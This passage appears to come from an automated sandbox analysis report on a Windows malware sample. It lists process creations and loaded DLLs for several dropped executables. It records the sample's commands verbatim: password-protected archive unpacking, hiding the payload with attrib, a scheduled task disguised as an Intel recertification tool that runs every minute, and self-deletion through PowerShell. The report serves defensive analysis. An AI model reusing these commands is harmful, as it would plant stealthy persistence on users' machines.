                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeProcess created: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exe "C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeProcess created: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe "C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe"
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: dwrite.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: iconcodecservice.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: dwrite.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: iconcodecservice.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: amsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: gpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: wbemcomn.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: rasapi32.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: rasman.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: rtutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: secur32.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: schannel.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: mskeyprotect.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: ncryptsslp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: gpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: edputil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: appresolver.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: bcp47langs.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: slc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: sppc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeSection loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
